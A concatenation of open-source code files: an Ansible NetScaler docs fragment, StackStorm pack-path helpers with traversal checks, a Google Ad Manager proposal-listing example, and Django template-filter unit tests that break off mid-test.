assert t3.info(out=None) == t2.info(out=None)
| bsd-3-clause |
orgito/ansible | lib/ansible/utils/module_docs_fragments/netscaler.py | 13 | 2011 | class ModuleDocFragment(object):
DOCUMENTATION = '''
options:
nsip:
description:
- The ip address of the netscaler appliance where the nitro API calls will be made.
- "The port can be specified with the colon (:). E.g. 192.168.1.1:555."
required: True
nitro_user:
description:
- The username with which to authenticate to the netscaler node.
required: True
nitro_pass:
description:
- The password with which to authenticate to the netscaler node.
required: True
nitro_protocol:
choices: [ 'http', 'https' ]
default: http
description:
- Which protocol to use when accessing the nitro API objects.
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
type: bool
nitro_timeout:
description:
- Time in seconds until a timeout error is thrown when establishing a new session with Netscaler
default: 310
state:
choices: ['present', 'absent']
default: 'present'
description:
- The state of the resource being configured by the module on the netscaler node.
- When present the resource will be created if needed and configured according to the module's parameters.
- When absent the resource will be deleted from the netscaler node.
save_config:
description:
- If true the module will save the configuration on the netscaler node if it makes any changes.
- The module will not save the configuration on the netscaler node if it made no changes.
type: bool
default: true
notes:
- For more information on using Ansible to manage Citrix NetScaler Network devices see U(https://www.ansible.com/ansible-netscaler).
'''
| gpl-3.0 |
dennybaa/st2 | st2common/st2common/content/utils.py | 5 | 10089 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import os.path
from oslo_config import cfg
from st2common.constants.action import LIBS_DIR as ACTION_LIBS_DIR
from st2common.util.types import OrderedSet
from st2common.util.shell import quote_unix
__all__ = [
'get_system_packs_base_path',
'get_packs_base_paths',
'get_pack_base_path',
'get_pack_directory',
'get_pack_file_abs_path',
'get_pack_resource_file_abs_path',
'get_relative_path_to_pack',
'check_pack_directory_exists',
'check_pack_content_directory_exists'
]
def get_system_packs_base_path():
"""
Return a path to the directory where system packs are stored.
:rtype: ``str``
"""
return cfg.CONF.content.system_packs_base_path
def get_packs_base_paths():
"""
Return a list of base paths which are searched for integration packs.
:rtype: ``list``
"""
system_packs_base_path = get_system_packs_base_path()
packs_base_paths = cfg.CONF.content.packs_base_paths or ''
# Remove trailing colon (if present)
if packs_base_paths.endswith(':'):
packs_base_paths = packs_base_paths[:-1]
result = []
# System path is always first
if system_packs_base_path:
result.append(system_packs_base_path)
packs_base_paths = packs_base_paths.split(':')
result = result + packs_base_paths
result = [path for path in result if path]
result = list(OrderedSet(result))
return result
def check_pack_directory_exists(pack):
"""
Check if a provided pack exists in one of the pack paths.
:param pack: Pack name.
:type pack: ``str``
:rtype: ``bool``
"""
packs_base_paths = get_packs_base_paths()
for base_dir in packs_base_paths:
pack_path = os.path.join(base_dir, pack)
if os.path.exists(pack_path):
return True
return False
def check_pack_content_directory_exists(pack, content_type):
"""
Check if a provided pack exists in one of the pack paths.
:param pack: Pack name.
:type pack: ``str``
:param content_type: Content type (actions, sensors, rules).
:type content_type: ``str``
:rtype: ``bool``
"""
packs_base_paths = get_packs_base_paths()
for base_dir in packs_base_paths:
pack_content_pack = os.path.join(base_dir, pack, content_type)
if os.path.exists(pack_content_pack):
return True
return False
def get_pack_base_path(pack_name):
"""
Return full absolute base path to the content pack directory.
Note: This function looks for a pack in all the load paths and return path to the first pack
which matched the provided name.
If a pack is not found, we return a pack which points to the first packs directory (this is
here for backward compatibility reasons).
:param pack_name: Content pack name.
:type pack_name: ``str``
:rtype: ``str``
"""
if not pack_name:
return None
packs_base_paths = get_packs_base_paths()
for packs_base_path in packs_base_paths:
pack_base_path = os.path.join(packs_base_path, quote_unix(pack_name))
pack_base_path = os.path.abspath(pack_base_path)
if os.path.isdir(pack_base_path):
return pack_base_path
# Path with the provided name not found
pack_base_path = os.path.join(packs_base_paths[0], quote_unix(pack_name))
pack_base_path = os.path.abspath(pack_base_path)
return pack_base_path
def get_pack_directory(pack_name):
"""
Retrieve a directory for the provided pack.
If a directory for the provided pack doesn't exist in any of the search paths, None
is returned instead.
Note: If same pack exists in multiple search path, path to the first one is returned.
:param pack_name: Pack name.
:type pack_name: ``str``
:return: Pack to the pack directory.
:rtype: ``str`` or ``None``
"""
packs_base_paths = get_packs_base_paths()
for packs_base_path in packs_base_paths:
pack_base_path = os.path.join(packs_base_path, quote_unix(pack_name))
pack_base_path = os.path.abspath(pack_base_path)
if os.path.isdir(pack_base_path):
return pack_base_path
return None
def get_entry_point_abs_path(pack=None, entry_point=None):
"""
Return full absolute path of an action entry point in a pack.
:param pack_name: Content pack name.
:type pack_name: ``str``
:param entry_point: Action entry point.
:type entry_point: ``str``
:rtype: ``str``
"""
if not entry_point:
return None
if os.path.isabs(entry_point):
pack_base_path = get_pack_base_path(pack_name=pack)
common_prefix = os.path.commonprefix([pack_base_path, entry_point])
if common_prefix != pack_base_path:
raise ValueError('Entry point file "%s" is located outside of the pack directory' %
(entry_point))
return entry_point
entry_point_abs_path = get_pack_resource_file_abs_path(pack_name=pack,
resource_type='action',
file_path=entry_point)
return entry_point_abs_path
def get_pack_file_abs_path(pack_name, file_path):
"""
Retrieve full absolute path to the pack file.
Note: This function also takes care of sanitizing ``file_name`` argument
preventing directory traversal and similar attacks.
:param pack_name: Pack name.
:type pack_name: ``str``
:pack file_path: Resource file path relative to the pack directory (e.g. my_file.py or
actions/directory/my_file.py)
:type file_path: ``str``
:rtype: ``str``
"""
pack_base_path = get_pack_base_path(pack_name=pack_name)
path_components = []
path_components.append(pack_base_path)
# Normalize the path to prevent directory traversal
normalized_file_path = os.path.normpath('/' + file_path).lstrip('/')
if normalized_file_path != file_path:
raise ValueError('Invalid file path: %s' % (file_path))
path_components.append(normalized_file_path)
result = os.path.join(*path_components)
assert normalized_file_path in result
# Final safety check for common prefix to avoid traversal attack
common_prefix = os.path.commonprefix([pack_base_path, result])
if common_prefix != pack_base_path:
raise ValueError('Invalid file_path: %s' % (file_path))
return result
def get_pack_resource_file_abs_path(pack_name, resource_type, file_path):
"""
Retrieve full absolute path to the pack resource file.
Note: This function also takes care of sanitizing ``file_name`` argument
preventing directory traversal and similar attacks.
:param pack_name: Pack name.
:type pack_name: ``str``
:param resource_type: Pack resource type (e.g. action, sensor, etc.).
:type resource_type: ``str``
:pack file_path: Resource file path relative to the pack directory (e.g. my_file.py or
directory/my_file.py)
:type file_path: ``str``
:rtype: ``str``
"""
path_components = []
if resource_type == 'action':
path_components.append('actions/')
elif resource_type == 'sensor':
path_components.append('sensors/')
elif resource_type == 'rule':
path_components.append('rules/')
else:
raise ValueError('Invalid resource type: %s' % (resource_type))
path_components.append(file_path)
file_path = os.path.join(*path_components)
result = get_pack_file_abs_path(pack_name=pack_name, file_path=file_path)
return result
def get_relative_path_to_pack(pack_name, file_path):
"""
Retrieve a file path which is relative to the provided pack directory.
:rtype: ``str``
"""
pack_base_path = get_pack_base_path(pack_name=pack_name)
if not os.path.isabs(file_path):
return file_path
common_prefix = os.path.commonprefix([pack_base_path, file_path])
if common_prefix != pack_base_path:
raise ValueError('file_path is not located inside the pack directory')
relative_path = os.path.relpath(file_path, common_prefix)
return relative_path
def get_action_libs_abs_path(pack=None, entry_point=None):
"""
Return full absolute path of libs for an action.
:param pack_name: Content pack name.
:type pack_name: ``str``
:param entry_point: Action entry point.
:type entry_point: ``str``
:rtype: ``str``
"""
entry_point_abs_path = get_entry_point_abs_path(pack=pack, entry_point=entry_point)
if entry_point_abs_path is not None:
return os.path.join(os.path.dirname(entry_point_abs_path), ACTION_LIBS_DIR)
else:
return None
def get_aliases_base_paths():
"""
Return a list of base paths which are searched for action aliases.
:rtype: ``list``
"""
aliases_base_paths = cfg.CONF.content.aliases_base_paths or ''
# Remove trailing colon (if present)
if aliases_base_paths.endswith(':'):
aliases_base_paths = aliases_base_paths[:-1]
result = []
aliases_base_paths = aliases_base_paths.split(':')
result = aliases_base_paths
result = [path for path in result if path]
result = list(OrderedSet(result))
return result
| apache-2.0 |
Aloomaio/googleads-python-lib | examples/ad_manager/v201811/proposal_service/get_all_proposals.py | 1 | 1761 | #!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example gets all proposals.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
def main(client):
# Initialize appropriate service.
proposal_service = client.GetService('ProposalService', version='v201811')
# Create a statement to select proposals.
statement = ad_manager.StatementBuilder(version='v201811')
# Retrieve a small amount of proposals at a time, paging
# through until all proposals have been retrieved.
while True:
response = proposal_service.getProposalsByStatement(statement.ToStatement())
if 'results' in response and len(response['results']):
for proposal in response['results']:
# Print out some information for each proposal.
print('Proposal with ID "%d" and name "%s" was found.\n' %
(proposal['id'], proposal['name']))
statement.offset += statement.limit
else:
break
print '\nNumber of results found: %s' % response['totalResultSetSize']
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
| apache-2.0 |
sodafree/backend | tests/regressiontests/defaultfilters/tests.py | 25 | 29878 | # -*- coding: utf-8 -*-
from __future__ import with_statement
import datetime
import decimal
from django.template.defaultfilters import *
from django.test import TestCase
from django.utils import unittest, translation
class DefaultFiltersTests(TestCase):
def test_floatformat(self):
self.assertEqual(floatformat(7.7), u'7.7')
self.assertEqual(floatformat(7.0), u'7')
self.assertEqual(floatformat(0.7), u'0.7')
self.assertEqual(floatformat(0.07), u'0.1')
self.assertEqual(floatformat(0.007), u'0.0')
self.assertEqual(floatformat(0.0), u'0')
self.assertEqual(floatformat(7.7, 3), u'7.700')
self.assertEqual(floatformat(6.000000, 3), u'6.000')
self.assertEqual(floatformat(6.200000, 3), u'6.200')
self.assertEqual(floatformat(6.200000, -3), u'6.200')
self.assertEqual(floatformat(13.1031, -3), u'13.103')
self.assertEqual(floatformat(11.1197, -2), u'11.12')
self.assertEqual(floatformat(11.0000, -2), u'11')
self.assertEqual(floatformat(11.000001, -2), u'11.00')
self.assertEqual(floatformat(8.2798, 3), u'8.280')
self.assertEqual(floatformat(5555.555, 2), u'5555.56')
self.assertEqual(floatformat(001.3000, 2), u'1.30')
self.assertEqual(floatformat(0.12345, 2), u'0.12')
self.assertEqual(floatformat(decimal.Decimal('555.555'), 2), u'555.56')
self.assertEqual(floatformat(decimal.Decimal('09.000')), u'9')
self.assertEqual(floatformat(u'foo'), u'')
self.assertEqual(floatformat(13.1031, u'bar'), u'13.1031')
self.assertEqual(floatformat(18.125, 2), u'18.13')
self.assertEqual(floatformat(u'foo', u'bar'), u'')
self.assertEqual(floatformat(u'¿Cómo esta usted?'), u'')
self.assertEqual(floatformat(None), u'')
# Check that we're not converting to scientific notation.
self.assertEqual(floatformat(0, 6), u'0.000000')
self.assertEqual(floatformat(0, 7), u'0.0000000')
self.assertEqual(floatformat(0, 10), u'0.0000000000')
self.assertEqual(floatformat(0.000000000000000000015, 20),
u'0.00000000000000000002')
pos_inf = float(1e30000)
self.assertEqual(floatformat(pos_inf), unicode(pos_inf))
neg_inf = float(-1e30000)
self.assertEqual(floatformat(neg_inf), unicode(neg_inf))
nan = pos_inf / pos_inf
self.assertEqual(floatformat(nan), unicode(nan))
class FloatWrapper(object):
def __init__(self, value):
self.value = value
def __float__(self):
return self.value
self.assertEqual(floatformat(FloatWrapper(11.000001), -2), u'11.00')
# Regression for #15789
decimal_ctx = decimal.getcontext()
old_prec, decimal_ctx.prec = decimal_ctx.prec, 2
try:
self.assertEqual(floatformat(1.2345, 2), u'1.23')
self.assertEqual(floatformat(15.2042, -3), u'15.204')
self.assertEqual(floatformat(1.2345, '2'), u'1.23')
self.assertEqual(floatformat(15.2042, '-3'), u'15.204')
self.assertEqual(floatformat(decimal.Decimal('1.2345'), 2), u'1.23')
self.assertEqual(floatformat(decimal.Decimal('15.2042'), -3), u'15.204')
finally:
decimal_ctx.prec = old_prec
# This fails because of Python's float handling. Floats with many zeroes
# after the decimal point should be passed in as another type such as
# unicode or Decimal.
@unittest.expectedFailure
def test_floatformat_fail(self):
self.assertEqual(floatformat(1.00000000000000015, 16), u'1.0000000000000002')
def test_addslashes(self):
self.assertEqual(addslashes(u'"double quotes" and \'single quotes\''),
u'\\"double quotes\\" and \\\'single quotes\\\'')
self.assertEqual(addslashes(ur'\ : backslashes, too'),
u'\\\\ : backslashes, too')
def test_capfirst(self):
self.assertEqual(capfirst(u'hello world'), u'Hello world')
def test_escapejs(self):
self.assertEqual(escapejs_filter(u'"double quotes" and \'single quotes\''),
u'\\u0022double quotes\\u0022 and \\u0027single quotes\\u0027')
self.assertEqual(escapejs_filter(ur'\ : backslashes, too'),
u'\\u005C : backslashes, too')
self.assertEqual(escapejs_filter(u'and lots of whitespace: \r\n\t\v\f\b'),
u'and lots of whitespace: \\u000D\\u000A\\u0009\\u000B\\u000C\\u0008')
self.assertEqual(escapejs_filter(ur'<script>and this</script>'),
u'\\u003Cscript\\u003Eand this\\u003C/script\\u003E')
self.assertEqual(
escapejs_filter(u'paragraph separator:\u2029and line separator:\u2028'),
u'paragraph separator:\\u2029and line separator:\\u2028')
def test_fix_ampersands(self):
self.assertEqual(fix_ampersands_filter(u'Jack & Jill & Jeroboam'),
u'Jack & Jill & Jeroboam')
def test_linenumbers(self):
self.assertEqual(linenumbers(u'line 1\nline 2'),
u'1. line 1\n2. line 2')
self.assertEqual(linenumbers(u'\n'.join([u'x'] * 10)),
u'01. x\n02. x\n03. x\n04. x\n05. x\n06. x\n07. '\
u'x\n08. x\n09. x\n10. x')
def test_lower(self):
self.assertEqual(lower('TEST'), u'test')
# uppercase E umlaut
self.assertEqual(lower(u'\xcb'), u'\xeb')
def test_make_list(self):
self.assertEqual(make_list('abc'), [u'a', u'b', u'c'])
self.assertEqual(make_list(1234), [u'1', u'2', u'3', u'4'])
def test_slugify(self):
self.assertEqual(slugify(' Jack & Jill like numbers 1,2,3 and 4 and'\
' silly characters ?%.$!/'),
u'jack-jill-like-numbers-123-and-4-and-silly-characters')
self.assertEqual(slugify(u"Un \xe9l\xe9phant \xe0 l'or\xe9e du bois"),
u'un-elephant-a-loree-du-bois')
def test_stringformat(self):
self.assertEqual(stringformat(1, u'03d'), u'001')
self.assertEqual(stringformat(1, u'z'), u'')
def test_title(self):
self.assertEqual(title('a nice title, isn\'t it?'),
u"A Nice Title, Isn't It?")
self.assertEqual(title(u'discoth\xe8que'), u'Discoth\xe8que')
def test_truncatewords(self):
self.assertEqual(
truncatewords(u'A sentence with a few words in it', 1), u'A ...')
self.assertEqual(
truncatewords(u'A sentence with a few words in it', 5),
u'A sentence with a few ...')
self.assertEqual(
truncatewords(u'A sentence with a few words in it', 100),
u'A sentence with a few words in it')
self.assertEqual(
truncatewords(u'A sentence with a few words in it',
'not a number'), u'A sentence with a few words in it')
def test_truncatewords_html(self):
self.assertEqual(truncatewords_html(
u'<p>one <a href="#">two - three <br>four</a> five</p>', 0), u'')
self.assertEqual(truncatewords_html(u'<p>one <a href="#">two - '\
u'three <br>four</a> five</p>', 2),
u'<p>one <a href="#">two ...</a></p>')
self.assertEqual(truncatewords_html(
u'<p>one <a href="#">two - three <br>four</a> five</p>', 4),
u'<p>one <a href="#">two - three <br>four ...</a></p>')
self.assertEqual(truncatewords_html(
u'<p>one <a href="#">two - three <br>four</a> five</p>', 5),
u'<p>one <a href="#">two - three <br>four</a> five</p>')
self.assertEqual(truncatewords_html(
u'<p>one <a href="#">two - three <br>four</a> five</p>', 100),
u'<p>one <a href="#">two - three <br>four</a> five</p>')
self.assertEqual(truncatewords_html(
u'\xc5ngstr\xf6m was here', 1), u'\xc5ngstr\xf6m ...')
def test_upper(self):
self.assertEqual(upper(u'Mixed case input'), u'MIXED CASE INPUT')
# lowercase e umlaut
self.assertEqual(upper(u'\xeb'), u'\xcb')
def test_urlencode(self):
self.assertEqual(urlencode(u'fran\xe7ois & jill'),
u'fran%C3%A7ois%20%26%20jill')
self.assertEqual(urlencode(1), u'1')
def test_iriencode(self):
self.assertEqual(iriencode(u'S\xf8r-Tr\xf8ndelag'),
u'S%C3%B8r-Tr%C3%B8ndelag')
self.assertEqual(iriencode(urlencode(u'fran\xe7ois & jill')),
u'fran%C3%A7ois%20%26%20jill')
def test_urlizetrunc(self):
self.assertEqual(urlizetrunc(u'http://short.com/', 20), u'<a href='\
u'"http://short.com/" rel="nofollow">http://short.com/</a>')
self.assertEqual(urlizetrunc(u'http://www.google.co.uk/search?hl=en'\
u'&q=some+long+url&btnG=Search&meta=', 20), u'<a href="http://'\
u'www.google.co.uk/search?hl=en&q=some+long+url&btnG=Search&'\
u'meta=" rel="nofollow">http://www.google...</a>')
self.assertEqual(urlizetrunc('http://www.google.co.uk/search?hl=en'\
u'&q=some+long+url&btnG=Search&meta=', 20), u'<a href="http://'\
u'www.google.co.uk/search?hl=en&q=some+long+url&btnG=Search'\
u'&meta=" rel="nofollow">http://www.google...</a>')
# Check truncating of URIs which are the exact length
uri = 'http://31characteruri.com/test/'
self.assertEqual(len(uri), 31)
self.assertEqual(urlizetrunc(uri, 31),
u'<a href="http://31characteruri.com/test/" rel="nofollow">'\
u'http://31characteruri.com/test/</a>')
self.assertEqual(urlizetrunc(uri, 30),
u'<a href="http://31characteruri.com/test/" rel="nofollow">'\
u'http://31characteruri.com/t...</a>')
self.assertEqual(urlizetrunc(uri, 2),
u'<a href="http://31characteruri.com/test/"'\
u' rel="nofollow">...</a>')
def test_urlize(self):
# Check normal urlize
self.assertEqual(urlize('http://google.com'),
u'<a href="http://google.com" rel="nofollow">http://google.com</a>')
self.assertEqual(urlize('http://google.com/'),
u'<a href="http://google.com/" rel="nofollow">http://google.com/</a>')
self.assertEqual(urlize('www.google.com'),
u'<a href="http://www.google.com" rel="nofollow">www.google.com</a>')
self.assertEqual(urlize('djangoproject.org'),
u'<a href="http://djangoproject.org" rel="nofollow">djangoproject.org</a>')
self.assertEqual(urlize('info@djangoproject.org'),
u'<a href="mailto:info@djangoproject.org">info@djangoproject.org</a>')
# Check urlize with https addresses
self.assertEqual(urlize('https://google.com'),
u'<a href="https://google.com" rel="nofollow">https://google.com</a>')
# Check urlize doesn't overquote already quoted urls - see #9655
self.assertEqual(urlize('http://hi.baidu.com/%D6%D8%D0%C2%BF'),
u'<a href="http://hi.baidu.com/%D6%D8%D0%C2%BF" rel="nofollow">'
u'http://hi.baidu.com/%D6%D8%D0%C2%BF</a>')
self.assertEqual(urlize('www.mystore.com/30%OffCoupons!'),
u'<a href="http://www.mystore.com/30%25OffCoupons!" rel="nofollow">'
u'www.mystore.com/30%OffCoupons!</a>')
self.assertEqual(urlize('http://en.wikipedia.org/wiki/Caf%C3%A9'),
u'<a href="http://en.wikipedia.org/wiki/Caf%C3%A9" rel="nofollow">'
u'http://en.wikipedia.org/wiki/Caf%C3%A9</a>')
self.assertEqual(urlize('http://en.wikipedia.org/wiki/Café'),
u'<a href="http://en.wikipedia.org/wiki/Caf%C3%A9" rel="nofollow">'
u'http://en.wikipedia.org/wiki/Café</a>')
# Check urlize keeps balanced parentheses - see #11911
self.assertEqual(urlize('http://en.wikipedia.org/wiki/Django_(web_framework)'),
u'<a href="http://en.wikipedia.org/wiki/Django_(web_framework)" rel="nofollow">'
u'http://en.wikipedia.org/wiki/Django_(web_framework)</a>')
self.assertEqual(urlize('(see http://en.wikipedia.org/wiki/Django_(web_framework))'),
u'(see <a href="http://en.wikipedia.org/wiki/Django_(web_framework)" rel="nofollow">'
u'http://en.wikipedia.org/wiki/Django_(web_framework)</a>)')
# Check urlize adds nofollow properly - see #12183
self.assertEqual(urlize('foo@bar.com or www.bar.com'),
u'<a href="mailto:foo@bar.com">foo@bar.com</a> or '
u'<a href="http://www.bar.com" rel="nofollow">www.bar.com</a>')
# Check urlize handles IDN correctly - see #13704
self.assertEqual(urlize('http://c✶.ws'),
u'<a href="http://xn--c-lgq.ws" rel="nofollow">http://c✶.ws</a>')
self.assertEqual(urlize('www.c✶.ws'),
u'<a href="http://www.xn--c-lgq.ws" rel="nofollow">www.c✶.ws</a>')
self.assertEqual(urlize('c✶.org'),
u'<a href="http://xn--c-lgq.org" rel="nofollow">c✶.org</a>')
self.assertEqual(urlize('info@c✶.org'),
u'<a href="mailto:info@xn--c-lgq.org">info@c✶.org</a>')
# Check urlize doesn't highlight malformed URIs - see #16395
self.assertEqual(urlize('http:///www.google.com'),
u'http:///www.google.com')
self.assertEqual(urlize('http://.google.com'),
u'http://.google.com')
self.assertEqual(urlize('http://@foo.com'),
u'http://@foo.com')
# Check urlize accepts more TLDs - see #16656
self.assertEqual(urlize('usa.gov'),
u'<a href="http://usa.gov" rel="nofollow">usa.gov</a>')
# Check urlize don't crash on invalid email with dot-starting domain - see #17592
self.assertEqual(urlize('email@.stream.ru'),
u'email@.stream.ru')
def test_wordcount(self):
self.assertEqual(wordcount(''), 0)
self.assertEqual(wordcount(u'oneword'), 1)
self.assertEqual(wordcount(u'lots of words'), 3)
self.assertEqual(wordwrap(u'this is a long paragraph of text that '\
u'really needs to be wrapped I\'m afraid', 14),
u"this is a long\nparagraph of\ntext that\nreally needs\nto be "\
u"wrapped\nI'm afraid")
self.assertEqual(wordwrap(u'this is a short paragraph of text.\n '\
u'But this line should be indented', 14),
u'this is a\nshort\nparagraph of\ntext.\n But this\nline '\
u'should be\nindented')
self.assertEqual(wordwrap(u'this is a short paragraph of text.\n '\
u'But this line should be indented',15), u'this is a short\n'\
u'paragraph of\ntext.\n But this line\nshould be\nindented')
def test_rjust(self):
self.assertEqual(ljust(u'test', 10), u'test ')
self.assertEqual(ljust(u'test', 3), u'test')
self.assertEqual(rjust(u'test', 10), u' test')
self.assertEqual(rjust(u'test', 3), u'test')
def test_center(self):
self.assertEqual(center(u'test', 6), u' test ')
def test_cut(self):
self.assertEqual(cut(u'a string to be mangled', 'a'),
u' string to be mngled')
self.assertEqual(cut(u'a string to be mangled', 'ng'),
u'a stri to be maled')
self.assertEqual(cut(u'a string to be mangled', 'strings'),
u'a string to be mangled')
def test_force_escape(self):
self.assertEqual(
force_escape(u'<some html & special characters > here'),
u'<some html & special characters > here')
self.assertEqual(
force_escape(u'<some html & special characters > here ĐÅ€£'),
u'<some html & special characters > here'\
u' \u0110\xc5\u20ac\xa3')
def test_linebreaks(self):
self.assertEqual(linebreaks_filter(u'line 1'), u'<p>line 1</p>')
self.assertEqual(linebreaks_filter(u'line 1\nline 2'),
u'<p>line 1<br />line 2</p>')
self.assertEqual(linebreaks_filter(u'line 1\rline 2'),
u'<p>line 1<br />line 2</p>')
self.assertEqual(linebreaks_filter(u'line 1\r\nline 2'),
u'<p>line 1<br />line 2</p>')
def test_linebreaksbr(self):
self.assertEqual(linebreaksbr(u'line 1\nline 2'),
u'line 1<br />line 2')
self.assertEqual(linebreaksbr(u'line 1\rline 2'),
u'line 1<br />line 2')
self.assertEqual(linebreaksbr(u'line 1\r\nline 2'),
u'line 1<br />line 2')
def test_removetags(self):
self.assertEqual(removetags(u'some <b>html</b> with <script>alert'\
u'("You smell")</script> disallowed <img /> tags', 'script img'),
u'some <b>html</b> with alert("You smell") disallowed tags')
self.assertEqual(striptags(u'some <b>html</b> with <script>alert'\
u'("You smell")</script> disallowed <img /> tags'),
u'some html with alert("You smell") disallowed tags')
def test_dictsort(self):
sorted_dicts = dictsort([{'age': 23, 'name': 'Barbara-Ann'},
{'age': 63, 'name': 'Ra Ra Rasputin'},
{'name': 'Jonny B Goode', 'age': 18}], 'age')
self.assertEqual([sorted(dict.items()) for dict in sorted_dicts],
[[('age', 18), ('name', 'Jonny B Goode')],
[('age', 23), ('name', 'Barbara-Ann')],
[('age', 63), ('name', 'Ra Ra Rasputin')]])
# If it gets passed a list of something else different from
# dictionaries it should fail silently
self.assertEqual(dictsort([1, 2, 3], 'age'), '')
self.assertEqual(dictsort('Hello!', 'age'), '')
self.assertEqual(dictsort({'a': 1}, 'age'), '')
self.assertEqual(dictsort(1, 'age'), '')
def test_dictsortreversed(self):
sorted_dicts = dictsortreversed([{'age': 23, 'name': 'Barbara-Ann'},
{'age': 63, 'name': 'Ra Ra Rasputin'},
{'name': 'Jonny B Goode', 'age': 18}],
'age')
self.assertEqual([sorted(dict.items()) for dict in sorted_dicts],
[[('age', 63), ('name', 'Ra Ra Rasputin')],
[('age', 23), ('name', 'Barbara-Ann')],
[('age', 18), ('name', 'Jonny B Goode')]])
# If it gets passed a list of something else different from
# dictionaries it should fail silently
self.assertEqual(dictsortreversed([1, 2, 3], 'age'), '')
self.assertEqual(dictsortreversed('Hello!', 'age'), '')
self.assertEqual(dictsortreversed({'a': 1}, 'age'), '')
self.assertEqual(dictsortreversed(1, 'age'), '')
def test_first(self):
self.assertEqual(first([0,1,2]), 0)
self.assertEqual(first(u''), u'')
self.assertEqual(first(u'test'), u't')
def test_join(self):
self.assertEqual(join([0,1,2], u'glue'), u'0glue1glue2')
def test_length(self):
self.assertEqual(length(u'1234'), 4)
self.assertEqual(length([1,2,3,4]), 4)
self.assertEqual(length_is([], 0), True)
self.assertEqual(length_is([], 1), False)
self.assertEqual(length_is('a', 1), True)
self.assertEqual(length_is(u'a', 10), False)
def test_slice(self):
self.assertEqual(slice_filter(u'abcdefg', u'0'), u'')
self.assertEqual(slice_filter(u'abcdefg', u'1'), u'a')
self.assertEqual(slice_filter(u'abcdefg', u'-1'), u'abcdef')
self.assertEqual(slice_filter(u'abcdefg', u'1:2'), u'b')
self.assertEqual(slice_filter(u'abcdefg', u'1:3'), u'bc')
self.assertEqual(slice_filter(u'abcdefg', u'0::2'), u'aceg')
def test_unordered_list(self):
self.assertEqual(unordered_list([u'item 1', u'item 2']),
u'\t<li>item 1</li>\n\t<li>item 2</li>')
self.assertEqual(unordered_list([u'item 1', [u'item 1.1']]),
u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t</ul>\n\t</li>')
self.assertEqual(
unordered_list([u'item 1', [u'item 1.1', u'item1.2'], u'item 2']),
u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t\t<li>item1.2'\
u'</li>\n\t</ul>\n\t</li>\n\t<li>item 2</li>')
self.assertEqual(
unordered_list([u'item 1', [u'item 1.1', [u'item 1.1.1',
[u'item 1.1.1.1']]]]),
u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1\n\t\t<ul>\n\t\t\t<li>'\
u'item 1.1.1\n\t\t\t<ul>\n\t\t\t\t<li>item 1.1.1.1</li>\n\t\t\t'\
u'</ul>\n\t\t\t</li>\n\t\t</ul>\n\t\t</li>\n\t</ul>\n\t</li>')
self.assertEqual(unordered_list(
['States', ['Kansas', ['Lawrence', 'Topeka'], 'Illinois']]),
u'\t<li>States\n\t<ul>\n\t\t<li>Kansas\n\t\t<ul>\n\t\t\t<li>'\
u'Lawrence</li>\n\t\t\t<li>Topeka</li>\n\t\t</ul>\n\t\t</li>'\
u'\n\t\t<li>Illinois</li>\n\t</ul>\n\t</li>')
class ULItem(object):
def __init__(self, title):
self.title = title
def __unicode__(self):
return u'ulitem-%s' % str(self.title)
a = ULItem('a')
b = ULItem('b')
self.assertEqual(unordered_list([a,b]),
u'\t<li>ulitem-a</li>\n\t<li>ulitem-b</li>')
# Old format for unordered lists should still work
self.assertEqual(unordered_list([u'item 1', []]), u'\t<li>item 1</li>')
self.assertEqual(unordered_list([u'item 1', [[u'item 1.1', []]]]),
u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1</li>\n\t</ul>\n\t</li>')
self.assertEqual(unordered_list([u'item 1', [[u'item 1.1', []],
[u'item 1.2', []]]]), u'\t<li>item 1\n\t<ul>\n\t\t<li>item 1.1'\
u'</li>\n\t\t<li>item 1.2</li>\n\t</ul>\n\t</li>')
self.assertEqual(unordered_list(['States', [['Kansas', [['Lawrence',
[]], ['Topeka', []]]], ['Illinois', []]]]), u'\t<li>States\n\t'\
u'<ul>\n\t\t<li>Kansas\n\t\t<ul>\n\t\t\t<li>Lawrence</li>'\
u'\n\t\t\t<li>Topeka</li>\n\t\t</ul>\n\t\t</li>\n\t\t<li>'\
u'Illinois</li>\n\t</ul>\n\t</li>')
def test_add(self):
self.assertEqual(add(u'1', u'2'), 3)
def test_get_digit(self):
self.assertEqual(get_digit(123, 1), 3)
self.assertEqual(get_digit(123, 2), 2)
self.assertEqual(get_digit(123, 3), 1)
self.assertEqual(get_digit(123, 4), 0)
self.assertEqual(get_digit(123, 0), 123)
self.assertEqual(get_digit(u'xyz', 0), u'xyz')
def test_date(self):
# real testing of date() is in dateformat.py
self.assertEqual(date(datetime.datetime(2005, 12, 29), u"d F Y"),
u'29 December 2005')
self.assertEqual(date(datetime.datetime(2005, 12, 29), ur'jS \o\f F'),
u'29th of December')
def test_time(self):
# real testing of time() is done in dateformat.py
self.assertEqual(time(datetime.time(13), u"h"), u'01')
self.assertEqual(time(datetime.time(0), u"h"), u'12')
def test_timesince(self):
# real testing is done in timesince.py, where we can provide our own 'now'
self.assertEqual(
timesince_filter(datetime.datetime.now() - datetime.timedelta(1)),
u'1 day')
self.assertEqual(
